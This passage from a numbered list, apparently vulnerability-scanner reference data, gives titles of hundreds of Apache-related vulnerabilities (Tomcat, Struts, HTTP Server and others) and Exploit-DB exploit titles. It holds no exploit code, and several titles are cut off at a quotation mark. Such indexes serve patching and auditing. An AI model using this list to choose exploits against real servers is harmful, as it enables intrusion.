6857| [72757] Apache HTTP Server MPM denial of service
6858| [72585] Apache Struts ParameterInterceptor security bypass
6859| [72438] Apache Tomcat Digest security bypass
6860| [72437] Apache Tomcat Digest security bypass
6861| [72436] Apache Tomcat DIGEST security bypass
6862| [72425] Apache Tomcat parameter denial of service
6863| [72422] Apache Tomcat request object information disclosure
6864| [72377] Apache HTTP Server scoreboard security bypass
6865| [72345] Apache HTTP Server HTTP request denial of service
6866| [72229] Apache Struts ExceptionDelegator command execution
6867| [72089] Apache Struts ParameterInterceptor directory traversal
6868| [72088] Apache Struts CookieInterceptor command execution
6869| [72047] Apache Geronimo hash denial of service
6870| [72016] Apache Tomcat hash denial of service
6871| [71711] Apache Struts OGNL expression code execution
6872| [71654] Apache Struts interfaces security bypass
6873| [71620] Apache ActiveMQ failover denial of service
6874| [71617] Apache HTTP Server mod_proxy module information disclosure
6875| [71508] Apache MyFaces EL security bypass
6876| [71445] Apache HTTP Server mod_proxy security bypass
6877| [71203] Apache Tomcat servlets privilege escalation
6878| [71181] Apache HTTP Server ap_pregsub() denial of service
6879| [71093] Apache HTTP Server ap_pregsub() buffer overflow
6880| [70336] Apache HTTP Server mod_proxy information disclosure
6881| [69804] Apache HTTP Server mod_proxy_ajp denial of service
6882| [69472] Apache Tomcat AJP security bypass
6883| [69396] Apache HTTP Server ByteRange filter denial of service
6884| [69394] Apache Wicket multi window support cross-site scripting
6885| [69176] Apache Tomcat XML information disclosure
6886| [69161] Apache Tomcat jsvc information disclosure
6887| [68799] mod_authnz_external module for Apache mysql-auth.pl SQL injection
6888| [68541] Apache Tomcat sendfile information disclosure
6889| [68420] Apache XML Security denial of service
6890| [68238] Apache Tomcat JMX information disclosure
6891| [67860] Apache Rampart/C rampart_timestamp_token_validate security bypass
6892| [67804] Apache Subversion control rules information disclosure
6893| [67803] Apache Subversion control rules denial of service
6894| [67802] Apache Subversion baselined denial of service
6895| [67672] Apache Archiva multiple cross-site scripting
6896| [67671] Apache Archiva multiple cross-site request forgery
6897| [67564] Apache APR apr_fnmatch() denial of service
6898| [67532] IBM WebSphere Application Server org.apache.jasper.runtime.JspWriterImpl.response denial of service
6899| [67515] Apache Tomcat annotations security bypass
6900| [67480] Apache Struts s:submit information disclosure
6901| [67414] Apache APR apr_fnmatch() denial of service
6902| [67356] Apache Struts javatemplates cross-site scripting
6903| [67354] Apache Struts Xwork cross-site scripting
6904| [66676] Apache Tomcat HTTP BIO information disclosure
6905| [66675] Apache Tomcat web.xml security bypass
6906| [66640] Apache HttpComponents HttpClient Proxy-Authorization information disclosure
6907| [66241] Apache HttpComponents information disclosure
6908| [66154] Apache Tomcat ServletSecurity security bypass
6909| [65971] Apache Tomcat ServletSecurity security bypass
6910| [65876] Apache Subversion mod_dav_svn denial of service
6911| [65343] Apache Continuum unspecified cross-site scripting
6912| [65162] Apache Tomcat NIO connector denial of service
6913| [65161] Apache Tomcat javax.servlet.ServletRequest.getLocale() denial of service
6914| [65160] Apache Tomcat HTML Manager interface cross-site scripting
6915| [65159] Apache Tomcat ServletContect security bypass
6916| [65050] Apache CouchDB web-based administration UI cross-site scripting
6917| [64773] Oracle HTTP Server Apache Plugin unauthorized access
6918| [64473] Apache Subversion blame -g denial of service
6919| [64472] Apache Subversion walk() denial of service
6920| [64407] Apache Axis2 CVE-2010-0219 code execution
6921| [63926] Apache Archiva password privilege escalation
6922| [63785] Apache CouchDB LD_LIBRARY_PATH privilege escalation
6923| [63493] Apache Archiva credentials cross-site request forgery
6924| [63477] Apache Tomcat HttpOnly session hijacking
6925| [63422] Apache Tomcat sessionsList.jsp cross-site scripting
6926| [63303] Apache mod_fcgid module fcgid_header_bucket_read() buffer overflow
6927| [62959] Apache Shiro filters security bypass
6928| [62790] Apache Perl cgi module denial of service
6929| [62576] Apache Qpid exchange denial of service
6930| [62575] Apache Qpid AMQP denial of service
6931| [62354] Apache Qpid SSL denial of service
6932| [62235] Apache APR-util apr_brigade_split_line() denial of service
6933| [62181] Apache XML-RPC SAX Parser information disclosure
6934| [61721] Apache Traffic Server cache poisoning
6935| [61202] Apache Derby BUILTIN authentication functionality information disclosure
6936| [61186] Apache CouchDB Futon cross-site request forgery
6937| [61169] Apache CXF DTD denial of service
6938| [61070] Apache Jackrabbit search.jsp SQL injection
6939| [61006] Apache SLMS Quoting cross-site request forgery
6940| [60962] Apache Tomcat time cross-site scripting
6941| [60883] Apache mod_proxy_http information disclosure
6942| [60671] Apache HTTP Server mod_cache and mod_dav denial of service
6943| [60264] Apache Tomcat Transfer-Encoding denial of service
6944| [59746] Apache Axis2 axis2/axis2-admin page session hijacking
6945| [59588] Apache Axis2/Java XML DTD (Document Type Declaration) data denial of service
6946| [59413] Apache mod_proxy_http timeout information disclosure
6947| [59058] Apache MyFaces unencrypted view state cross-site scripting
6948| [58827] Apache Axis2 xsd file include
6949| [58790] Apache Axis2 modules cross-site scripting
6950| [58299] Apache ActiveMQ queueBrowse cross-site scripting
6951| [58169] Apache Tomcat Web Application Manager / Host Manager cross-site request forgery
6952| [58056] Apache ActiveMQ .jsp source code disclosure
6953| [58055] Apache Tomcat realm name information disclosure
6954| [58046] Apache HTTP Server mod_auth_shadow security bypass
6955| [57841] Apache Open For Business Project (OFBiz) subject cross-site scripting
6956| [57840] Apache Open For Business Project (OFBiz) multiple parameters cross-site scripting
6957| [57429] Apache CouchDB algorithms information disclosure
6958| [57398] Apache ActiveMQ Web console cross-site request forgery
6959| [57397] Apache ActiveMQ createDestination.action cross-site scripting
6960| [56653] Apache HTTP Server DNS spoofing
6961| [56652] Apache HTTP Server DNS cross-site scripting
6962| [56625] Apache HTTP Server request header information disclosure
6963| [56624] Apache HTTP Server mod_isapi orphaned callback pointer code execution
6964| [56623] Apache HTTP Server mod_proxy_ajp denial of service
6965| [55941] mod_proxy module for Apache ap_proxy_send_fb() buffer overflow
6966| [55857] Apache Tomcat WAR files directory traversal
6967| [55856] Apache Tomcat autoDeploy attribute security bypass
6968| [55855] Apache Tomcat WAR directory traversal
6969| [55210] Intuit component for Joomla! Apache information disclosure
6970| [54533] Apache Tomcat 404 error page cross-site scripting
6971| [54182] Apache Tomcat admin default password
6972| [53878] Apache Solr Search (solr) extension for TYPO3 unspecified cross-site scripting
6973| [53666] Apache HTTP Server Solaris pollset support denial of service
6974| [53650] Apache HTTP Server HTTP basic-auth module security bypass
6975| [53124] mod_proxy_ftp module for Apache HTTP header security bypass
6976| [53041] mod_proxy_ftp module for Apache denial of service
6977| [52540] Apache Portable Runtime and Apache Portable Utility library multiple buffer overflow
6978| [51953] Apache Tomcat Path Disclosure
6979| [51952] Apache Tomcat Path Traversal
6980| [51951] Apache stronghold-status Information Disclosure
6981| [51950] Apache stronghold-info Information Disclosure
6982| [51949] Apache PHP Source Code Disclosure
6983| [51948] Apache Multiviews Attack
6984| [51946] Apache JServ Environment Status Information Disclosure
6985| [51945] Apache error_log Information Disclosure
6986| [51944] Apache Default Installation Page Pattern Found
6987| [51943] Apache AXIS XML Parser echoheaders.jws Sample Web Service Denial of Service
6988| [51942] Apache AXIS XML External Entity File Retrieval
6989| [51941] Apache AXIS Sample Servlet Information Leak
6990| [51940] Apache access_log Information Disclosure
6991| [51626] Apache mod_deflate denial of service
6992| [51532] mod_proxy module for the Apache HTTP Server stream_reqbody_cl denial of service
6993| [51365] Apache Tomcat RequestDispatcher security bypass
6994| [51273] Apache HTTP Server Incomplete Request denial of service
6995| [51195] Apache Tomcat XML information disclosure
6996| [50994] Apache APR-util xml/apr_xml.c denial of service
6997| [50993] Apache APR-util apr_brigade_vprintf denial of service
6998| [50964] Apache APR-util apr_strmatch_precompile() denial of service
6999| [50930] Apache Tomcat j_security_check information disclosure
7000| [50928] Apache Tomcat AJP denial of service
7001| [50884] Apache HTTP Server XML ENTITY denial of service
7002| [50808] Apache HTTP Server AllowOverride privilege escalation
7003| [50108] Apache Struts s:a tag and s:url tag cross-site scripting
7004| [50059] Apache mod_proxy_ajp information disclosure
7005| [49951] Apache Tiles Expression Language (EL) expressions cross-site scripting
7006| [49925] Apache Geronimo Web Administrative Console cross-site request forgery
7007| [49924] Apache Geronimo console/portal/Server/Monitoring cross-site scripting
7008| [49921] Apache ActiveMQ Web interface cross-site scripting
7009| [49898] Apache Geronimo Services/Repository directory traversal
7010| [49725] Apache Tomcat mod_jk module information disclosure
7011| [49715] Apache mod_perl Apache::Status and Apache2::Status modules cross-site scripting
7012| [49712] Apache Struts unspecified cross-site scripting
7013| [49213] Apache Tomcat cal2.jsp cross-site scripting
7014| [48934] Apache Tomcat POST doRead method information disclosure
7015| [48211] Apache Tomcat header HTTP request smuggling
7016| [48163] libapache2-mod-auth-mysql module for Debian multibyte encoding SQL injection
7017| [48110] Apache Jackrabbit search.jsp and swr.jsp cross-site scripting
7018| [47709] Apache Roller "
7019| [47104] Novell Netware ApacheAdmin console security bypass
7020| [47086] Apache HTTP Server OS fingerprinting unspecified
7021| [46329] Apache Struts FilterDispatcher and DefaultStaticContentLoader class directory traversal
7022| [45791] Apache Tomcat RemoteFilterValve security bypass
7023| [44435] Oracle WebLogic Apache Connector buffer overflow
7024| [44411] Apache Tomcat allowLinking UTF-8 directory traversal
7025| [44223] Apache HTTP Server mod_proxy_ftp cross-site scripting
7026| [44156] Apache Tomcat RequestDispatcher directory traversal
7027| [44155] Apache Tomcat HttpServletResponse.sendError() cross-site scripting
7028| [43885] Oracle WebLogic Server Apache Connector buffer overflow
7029| [42987] Apache HTTP Server mod_proxy module denial of service
7030| [42915] Apache Tomcat JSP files path disclosure
7031| [42914] Apache Tomcat MS-DOS path disclosure
7032| [42892] Apache Tomcat unspecified unauthorized access
7033| [42816] Apache Tomcat Host Manager cross-site scripting
7034| [42303] Apache 403 error cross-site scripting
7035| [41618] Apache-SSL ExpandCert() authentication bypass
7036| [40761] Apache Derby RDBNAM parameter and DatabaseMetaData.getURL information disclosure
7037| [40736] Apache Tomcat HTTP/1.1 connector information disclosure
7038| [40614] Apache mod_jk2 HTTP Host header buffer overflow
7039| [40562] Apache Geronimo init information disclosure
7040| [40478] Novell Web Manager webadmin-apache.conf security bypass
7041| [40411] Apache Tomcat exception handling information disclosure
7042| [40409] Apache Tomcat native (APR based) connector weak security
7043| [40403] Apache Tomcat quotes and %5C cookie information disclosure
7044| [40388] Sun Java Plug-In org.apache.crimson.tree.XmlDocument security bypass
7045| [39893] Apache HTTP Server mod_negotiation HTTP response splitting
7046| [39867] Apache HTTP Server mod_negotiation cross-site scripting
7047| [39804] Apache Tomcat SingleSignOn information disclosure
7048| [39615] Apache HTTP Server mod_proxy_ftp.c UTF-7 cross-site scripting
7049| [39612] Apache HTTP Server mod_proxy_balancer buffer overflow
7050| [39608] Apache HTTP Server balancer manager cross-site request forgery
7051| [39476] Apache mod_proxy_balancer balancer_handler function denial of service
7052| [39474] Apache HTTP Server mod_proxy_balancer cross-site scripting
7053| [39472] Apache HTTP Server mod_status cross-site scripting
7054| [39201] Apache Tomcat JULI logging weak security
7055| [39158] Apache HTTP Server Windows SMB shares information disclosure
7056| [39001] Apache HTTP Server mod_imap and mod_imagemap module cross-site scripting
7057| [38951] Apache::AuthCAS Perl module cookie SQL injection
7058| [38800] Apache HTTP Server 413 error page cross-site scripting
7059| [38211] Apache Geronimo SQLLoginModule authentication bypass
7060| [37243] Apache Tomcat WebDAV directory traversal
7061| [37178] RHSA update for Apache HTTP Server mod_status module cross-site scripting not installed
7062| [37177] RHSA update for Apache HTTP Server Apache child process denial of service not installed
7063| [37119] RHSA update for Apache mod_auth_kerb off-by-one buffer overflow not installed
7064| [37100] RHSA update for Apache and IBM HTTP Server Expect header cross-site scripting not installed
7065| [36782] Apache Geronimo MEJB unauthorized access
7066| [36586] Apache HTTP Server UTF-7 cross-site scripting
7067| [36468] Apache Geronimo LoginModule security bypass
7068| [36467] Apache Tomcat functions.jsp cross-site scripting
7069| [36402] Apache Tomcat calendar cross-site request forgery
7070| [36354] Apache HTTP Server mod_proxy module denial of service
7071| [36352] Apache HTTP Server ap_proxy_date_canon() denial of service
7072| [36336] Apache Derby lock table privilege escalation
7073| [36335] Apache Derby schema privilege escalation
7074| [36006] Apache Tomcat "
7075| [36001] Apache Tomcat Host Manager Servlet alias cross-site scripting
7076| [35999] Apache Tomcat \"
7077| [35795] Apache Tomcat CookieExample cross-site scripting
7078| [35536] Apache Tomcat SendMailServlet example cross-site scripting
7079| [35384] Apache HTTP Server mod_cache module denial of service
7080| [35097] Apache HTTP Server mod_status module cross-site scripting
7081| [35095] Apache HTTP Server Prefork MPM module denial of service
7082| [34984] Apache HTTP Server recall_headers information disclosure
7083| [34966] Apache HTTP Server MPM content spoofing
7084| [34965] Apache HTTP Server MPM information disclosure
7085| [34963] Apache HTTP Server MPM multiple denial of service
7086| [34872] Apache MyFaces Tomahawk autoscroll parameter cross-site scripting
7087| [34869] Apache Tomcat JSP example Web application cross-site scripting
7088| [34868] Apache Tomcat Manager and Host Manager cross-site scripting
7089| [34496] Apache Tomcat JK Connector security bypass
7090| [34377] Apache Tomcat hello.jsp cross-site scripting
7091| [34212] Apache Tomcat SSL configuration security bypass
7092| [34210] Apache Tomcat Accept-Language cross-site scripting
7093| [34209] Apache Tomcat calendar application cross-site scripting
7094| [34207] Apache Tomcat implicit-objects.jsp cross-site scripting
7095| [34167] Apache Axis WSDL file path disclosure
7096| [34068] Apache Tomcat AJP connector information disclosure
7097| [33584] Apache HTTP Server suEXEC privilege escalation
7098| [32988] Apache Tomcat proxy module directory traversal
7099| [32794] Apache Tomcat JK Web Server Connector map_uri_to_worker() buffer overflow
7100| [32708] Debian Apache tty privilege escalation
7101| [32441] ApacheStats extract() PHP call unspecified
7102| [32128] Apache Tomcat default account
7103| [31680] Apache Tomcat RequestParamExample cross-site scripting
7104| [31649] Apache Tomcat Sample Servlet TroubleShooter detected
7105| [31557] BEA WebLogic Server and WebLogic Express Apache proxy plug-in denial of service
7106| [31236] Apache HTTP Server htpasswd.c strcpy buffer overflow
7107| [30456] Apache mod_auth_kerb off-by-one buffer overflow
7108| [29550] Apache mod_tcl set_var() format string
7109| [28620] Apache and IBM HTTP Server Expect header cross-site scripting
7110| [28357] Apache HTTP Server mod_alias script source information disclosure
7111| [28063] Apache mod_rewrite off-by-one buffer overflow
7112| [27902] Apache Tomcat URL information disclosure
7113| [26786] Apache James SMTP server denial of service
7114| [25680] libapache2 /tmp/svn file upload
7115| [25614] Apache Struts lookupMap cross-site scripting
7116| [25613] Apache Struts ActionForm denial of service
7117| [25612] Apache Struts isCancelled() security bypass
7118| [24965] Apache mod_python FileSession command execution
7119| [24716] Apache James spooler memory leak denial of service
7120| [24159] Apache Geronimo Web-Access-Log Viewer cross-site scripting
7121| [24158] Apache Geronimo jsp-examples cross-site scripting
7122| [24030] Apache auth_ldap module multiple format strings
7123| [24008] Apache mod_ssl custom error message denial of service
7124| [24003] Apache mod_auth_pgsql module multiple syslog format strings
7125| [23612] Apache mod_imap referer field cross-site scripting
7126| [23173] Apache Struts error message cross-site scripting
7127| [22942] Apache Tomcat directory listing denial of service
7128| [22858] Apache Multi-Processing Module code allows denial of service
7129| [22602] RHSA-2005:582 updates for Apache httpd not installed
7130| [22520] Apache mod-auth-shadow "
7131| [22466] ApacheTop symlink
7132| [22109] Apache HTTP Server ssl_engine_kernel client certificate validation
7133| [22006] Apache HTTP Server byte-range filter denial of service
7134| [21567] Apache mod_ssl off-by-one buffer overflow
7135| [21195] Apache HTTP Server header HTTP request smuggling
7136| [20383] Apache HTTP Server htdigest buffer overflow
7137| [19681] Apache Tomcat AJP12 request denial of service
7138| [18993] Apache HTTP server check_forensic symlink attack
7139| [18790] Apache Tomcat Manager cross-site scripting
7140| [18349] Apache HTTP server Apple HFS+ filesystem obtain information
7141| [18348] Apache HTTP server Apple HFS+ filesystem .DS_Store and .ht file disclosure
7142| [18347] Apache HTTP server Apple Mac OS X Server mod_digest_apple module could allow an attacker to replay responses
7143| [17961] Apache Web server ServerTokens has not been set
7144| [17930] Apache HTTP Server HTTP GET request denial of service
7145| [17785] Apache mod_include module buffer overflow
7146| [17671] Apache HTTP Server SSLCipherSuite bypass restrictions
7147| [17473] Apache HTTP Server Satisfy directive allows access to resources
7148| [17413] Apache htpasswd buffer overflow
7149| [17384] Apache HTTP Server environment variable configuration file buffer overflow
7150| [17382] Apache HTTP Server IPv6 apr_util denial of service
7151| [17366] Apache HTTP Server mod_dav module LOCK denial of service
7152| [17273] Apache HTTP Server speculative mode denial of service
7153| [17200] Apache HTTP Server mod_ssl denial of service
7154| [16890] Apache HTTP Server server-info request has been detected
7155| [16889] Apache HTTP Server server-status request has been detected
7156| [16705] Apache mod_ssl format string attack
7157| [16524] Apache HTTP Server ap_get_mime_headers_core denial of service
7158| [16387] Apache HTTP Server mod_proxy Content-Length buffer overflow
7159| [16230] Apache HTTP Server PHP denial of service
7160| [16214] Apache mod_ssl ssl_util_uuencode_binary buffer overflow
7161| [15958] Apache HTTP Server authentication modules memory corruption
7162| [15547] Apache HTTP Server mod_disk_cache local information disclosure
7163| [15540] Apache HTTP Server socket starvation denial of service
7164| [15467] Novell GroupWise WebAccess using Apache Web server allows viewing of files on the server
7165| [15422] Apache HTTP Server mod_access information disclosure
7166| [15419] Apache HTTP Server mod_ssl plain HTTP request denial of service
7167| [15293] Apache for Cygwin "
7168| [15065] Apache-SSL has a default password
7169| [15041] Apache HTTP Server mod_digest module could allow an attacker to replay responses
7170| [15015] Apache httpd server httpd.conf could allow a local user to bypass restrictions
7171| [14751] Apache Mod_python output filter information disclosure
7172| [14125] Apache HTTP Server mod_userdir module information disclosure
7173| [14075] Apache HTTP Server mod_php file descriptor leak
7174| [13703] Apache HTTP Server account
7175| [13689] Apache HTTP Server configuration allows symlinks
7176| [13688] Apache HTTP Server configuration allows SSI
7177| [13687] Apache HTTP Server Server: header value
7178| [13685] Apache HTTP Server ServerTokens value
7179| [13684] Apache HTTP Server ServerSignature value
7180| [13672] Apache HTTP Server config allows directory autoindexing
7181| [13671] Apache HTTP Server default content
7182| [13670] Apache HTTP Server config file directive references outside content root
7183| [13668] Apache HTTP Server httpd not running in chroot environment
7184| [13666] Apache HTTP Server CGI directory contains possible command interpreter or compiler
7185| [13664] Apache HTTP Server config file contains ScriptAlias entry
7186| [13663] Apache HTTP Server CGI support modules loaded
7187| [13661] Apache HTTP Server config file contains AddHandler entry
7188| [13660] Apache HTTP Server 500 error page not CGI script
7189| [13659] Apache HTTP Server 413 error page not CGI script
7190| [13658] Apache HTTP Server 403 error page not CGI script
7191| [13657] Apache HTTP Server 401 error page not CGI script
7192| [13552] Apache HTTP Server mod_cgid module information disclosure
7193| [13550] Apache GET request directory traversal
7194| [13516] Apache Cocoon XMLForm and JXForm could allow execution of code
7195| [13499] Apache Cocoon directory traversal allows downloading of boot.ini file
7196| [13429] Apache Tomcat non-HTTP request denial of service
7197| [13400] Apache HTTP server mod_alias and mod_rewrite buffer overflow
7198| [13295] Apache weak password encryption
7199| [13254] Apache Tomcat .jsp cross-site scripting
7200| [13125] Apache::Gallery Inline::C could allow arbitrary code execution
7201| [13086] Apache Jakarta Tomcat mod_jk format string allows remote access
7202| [12681] Apache HTTP Server mod_proxy could allow mail relaying
7203| [12662] Apache HTTP Server rotatelogs denial of service
7204| [12554] Apache Tomcat stores password in plain text
7205| [12553] Apache HTTP Server redirects and subrequests denial of service
7206| [12552] Apache HTTP Server FTP proxy server denial of service
7207| [12551] Apache HTTP Server prefork MPM denial of service
7208| [12550] Apache HTTP Server weaker than expected encryption
7209| [12549] Apache HTTP Server type-map file denial of service
7210| [12206] Apache Tomcat /opt/tomcat directory insecure permissions
7211| [12102] Apache Jakarta Tomcat MS-DOS device name request denial of service
7212| [12091] Apache HTTP Server apr_password_validate denial of service
7213| [12090] Apache HTTP Server apr_psprintf code execution
7214| [11804] Apache HTTP Server mod_access_referer denial of service
7215| [11750] Apache HTTP Server could leak sensitive file descriptors
7216| [11730] Apache HTTP Server error log and access log terminal escape sequence injection
7217| [11703] Apache long slash path allows directory listing
7218| [11695] Apache HTTP Server LF (Line Feed) denial of service
7219| [11694] Apache HTTP Server filestat.c denial of service
7220| [11438] Apache HTTP Server MIME message boundaries information disclosure
7221| [11412] Apache HTTP Server error log terminal escape sequence injection
7222| [11196] Apache Tomcat examples and ROOT Web applications cross-site scripting
7223| [11195] Apache Tomcat web.xml could be used to read files
7224| [11194] Apache Tomcat URL appended with a null character could list directories
7225| [11139] Apache HTTP Server mass virtual hosting with mod_rewrite or mod_vhost_alias could allow an attacker to obtain files
7226| [11126] Apache HTTP Server illegal character file disclosure
7227| [11125] Apache HTTP Server DOS device name HTTP POST code execution
7228| [11124] Apache HTTP Server DOS device name denial of service
7229| [11088] Apache HTTP Server mod_vhost_alias CGI source disclosure
7230| [10938] Apache HTTP Server printenv test CGI cross-site scripting
7231| [10771] Apache Tomcat mod_jk module multiple HTTP GET request buffer overflow
7232| [10575] Apache mod_php module could allow an attacker to take over the httpd process
7233| [10499] Apache HTTP Server WebDAV HTTP POST view source
7234| [10457] Apache HTTP Server mod_ssl "
7235| [10415] Apache HTTP Server htdigest insecure system() call could allow command execution
7236| [10414] Apache HTTP Server htdigest multiple buffer overflows
7237| [10413] Apache HTTP Server htdigest temporary file race condition
7238| [10412] Apache HTTP Server htpasswd temporary file race condition
7239| [10376] Apache Tomcat invoker servlet used in conjunction with the default servlet reveals source code
7240| [10348] Apache Tomcat HTTP GET request DOS device reference could cause a denial of service
7241| [10281] Apache HTTP Server ab.c ApacheBench long response buffer overflow
7242| [10280] Apache HTTP Server shared memory scorecard overwrite
7243| [10263] Apache Tomcat mod_jk or mod_jserv connector directory disclosure
7244| [10241] Apache HTTP Server Host: header cross-site scripting
7245| [10230] Slapper worm variants A, B, and C target OpenSSL/Apache systems
7246| [10208] Apache HTTP Server mod_dav denial of service
7247| [10206] HP VVOS Apache mod_ssl denial of service
7248| [10200] Apache HTTP Server stderr denial of service
7249| [10175] Apache Tomcat org.apache.catalina.servlets.DefaultServlet reveals source code
7250| [10169] Slapper worm variant (Slapper.C) targets OpenSSL/Apache systems
7251| [10154] Slapper worm variant (Slapper.B) targets OpenSSL/Apache systems
7252| [10098] Slapper worm targets OpenSSL/Apache systems
7253| [9876] Apache HTTP Server cgi/cgid request could disclose the path to a requested script
7254| [9875] Apache HTTP Server .var file request could disclose installation path
7255| [9863] Apache Tomcat web.xml file could allow a remote attacker to bypass restrictions
7256| [9808] Apache HTTP Server non-Unix version URL encoded directory traversal
7257| [9623] Apache HTTP Server ap_log_rerror() path disclosure
7258| [9520] Apache Tomcat /servlet/ mapping cross-site scripting
7259| [9415] Apache HTTP Server mod_ssl .htaccess off-by-one buffer overflow
7260| [9396] Apache Tomcat null character to threads denial of service
7261| [9394] Apache Tomcat HTTP request for LPT9 reveals Web root path
7262| [9249] Apache HTTP Server chunked encoding heap buffer overflow
7263| [9208] Apache Tomcat sample file requests could reveal directory listing and path to Web root directory
7264| [8932] Apache Tomcat example class information disclosure
7265| [8633] Apache HTTP Server with mod_rewrite could allow an attacker to bypass directives
7266| [8629] Apache HTTP Server double-reverse DNS lookup spoofing
7267| [8589] Apache HTTP Server for Windows DOS batch file remote command execution
7268| [8457] Oracle9i Application Server Apache PL/SQL HTTP Location header buffer overflow
7269| [8455] Oracle9i Application Server default installation could allow an attacker to access certain Apache Services
7270| [8400] Apache HTTP Server mod_frontpage buffer overflows
7271| [8326] Apache HTTP Server multiple MIME headers (sioux) denial of service
7272| [8308] Apache "
7273| [8275] Apache HTTP Server with Multiviews enabled could disclose directory contents
7274| [8119] Apache and PHP OPTIONS request reveals "
7275| [8054] Apache is running on the system
7276| [8029] Mandrake Linux default Apache configuration could allow an attacker to browse files and directories
7277| [8027] Mandrake Linux default Apache configuration has remote management interface enabled
7278| [8026] Mandrake Linux Apache sample programs could disclose sensitive information about the server
7279| [7836] Apache HTTP Server log directory denial of service
7280| [7815] Apache for Windows "
7281| [7810] Apache HTTP request could result in unexpected behavior
7282| [7599] Apache Tomcat reveals installation path
7283| [7494] Apache "
7284| [7419] Apache Web Server could allow remote attackers to overwrite .log files
7285| [7363] Apache Web Server hidden HTTP requests
7286| [7249] Apache mod_proxy denial of service
7287| [7129] Linux with Apache Web server could allow an attacker to determine if a specified username exists
7288| [7103] Apple Mac OS X used with Apache Web server could disclose directory contents
7289| [7059] Apache "
7290| [7057] Apache "
7291| [7056] Apache "
7292| [7055] Apache "
7293| [7054] Apache "
7294| [6997] Apache Jakarta Tomcat error message may reveal information
7295| [6971] Apache Jakarta Tomcat may reveal JSP source code with missing HTTP protocol specification
7296| [6970] Apache crafted HTTP request could reveal the internal IP address
7297| [6921] Apache long slash path allows directory listing
7298| [6687] Apple Mac OS X used with Apache Web server could allow arbitrary file disclosure
7299| [6527] Apache Web Server for Windows and OS2 denial of service
7300| [6316] Apache Jakarta Tomcat may reveal JSP source code
7301| [6305] Apache Jakarta Tomcat directory traversal
7302| [5926] Linux Apache symbolic link
7303| [5659] Apache Web server discloses files when used with php script
7304| [5310] Apache mod_rewrite allows attacker to view arbitrary files
7305| [5204] Apache WebDAV directory listings
7306| [5197] Apache Web server reveals CGI script source code
7307| [5160] Apache Jakarta Tomcat default installation
7308| [5099] Trustix Secure Linux installs Apache with world writable access
7309| [4968] Apache Jakarta Tomcat snoop servlet gives out information which could be used in attack
7310| [4967] Apache Jakarta Tomcat 404 error reveals the pathname of the requested file
7311| [4931] Apache source.asp example file allows users to write to files
7312| [4575] IBM HTTP Server running Apache allows users to directory listing and file retrieval
7313| [4205] Apache Jakarta Tomcat delivers file contents
7314| [2084] Apache on Debian by default serves the /usr/doc directory
7315| [1630] MessageMedia UnityMail and Apache Web server MIME header flood denial of service
7316| [697] Apache HTTP server beck exploit
7317| [331] Apache cookies buffer overflow
7318|
7319| Exploit-DB - https://www.exploit-db.com:
7320| [31130] Apache Tomcat <= 6.0.15 Cookie Quote Handling Remote Information Disclosure Vulnerability
7321| [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
7322| [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
7323| [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
7324| [30563] Apache Tomcat <= 5.5.15 Cal2.JSP Cross-Site Scripting Vulnerability
7325| [30496] Apache Tomcat <= 6.0.13 Cookie Handling Quote Delimiter Session ID Disclosure
7326| [30495] Apache Tomcat <= 6.0.13 Host Manager Servlet Cross Site Scripting Vulnerability
7327| [30191] Apache MyFaces Tomahawk JSF Framework 1.1.5 Autoscroll Parameter Cross Site Scripting Vulnerability
7328| [30189] Apache Tomcat <= 6.0.13 JSP Example Web Applications Cross Site Scripting Vulnerability
7329| [30052] Apache Tomcat 6.0.10 Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
7330| [29930] Apache AXIS 1.0 Non-Existent WSDL Path Information Disclosure Vulnerability
7331| [29859] Apache Roller OGNL Injection
7332| [29739] Apache HTTP Server Tomcat 5.x/6.0.x Directory Traversal Vulnerability
7333| [29435] Apache Tomcat 5.5.25 - CSRF Vulnerabilities
7334| [29316] Apache + PHP 5.x - Remote Code Execution (Multithreaded Scanner) (2)
7335| [29290] Apache / PHP 5.x Remote Code Execution Exploit
7336| [28713] Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE
7337| [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
7338| [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability
7339| [28254] Apache Tomcat 5 Information Disclosure Vulnerability
7340| [27915] Apache James 2.2 SMTP Denial of Service Vulnerability
7341| [27397] Apache suEXEC Privilege Elevation / Information Disclosure
7342| [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
7343| [27096] Apache Geronimo 1.0 Error Page XSS
7344| [27095] Apache Tomcat / Geronimo 1.0 Sample Script cal2.jsp time Parameter XSS
7345| [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
7346| [26542] Apache Struts 1.2.7 Error Response Cross-Site Scripting Vulnerability
7347| [25986] Plesk Apache Zeroday Remote Exploit
7348| [25980] Apache Struts includeParams Remote Code Execution
7349| [25625] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (2)
7350| [25624] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (1)
7351| [24874] Apache Struts ParametersInterceptor Remote Code Execution
7352| [24744] Apache Rave 0.11 - 0.20 - User Information Disclosure
7353| [24694] Apache 1.3.x mod_include Local Buffer Overflow Vulnerability
7354| [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability
7355| [23751] Apache Cygwin 1.3.x/2.0.x Directory Traversal Vulnerability
7356| [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability
7357| [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)
7358| [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)
7359| [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error
7360| [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability
7361| [23245] Apache Tomcat 4.0.x Non-HTTP Request Denial of Service Vulnerability
7362| [23119] Apache::Gallery 0.4/0.5/0.6 Insecure Local File Storage Privilege Escalation Vulnerability
7363| [22505] Apache Mod_Access_Referer 1.0.2 NULL Pointer Dereference Denial of Service Vulnerability
7364| [22205] Apache Tomcat 3.x Null Byte Directory/File Disclosure Vulnerability
7365| [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
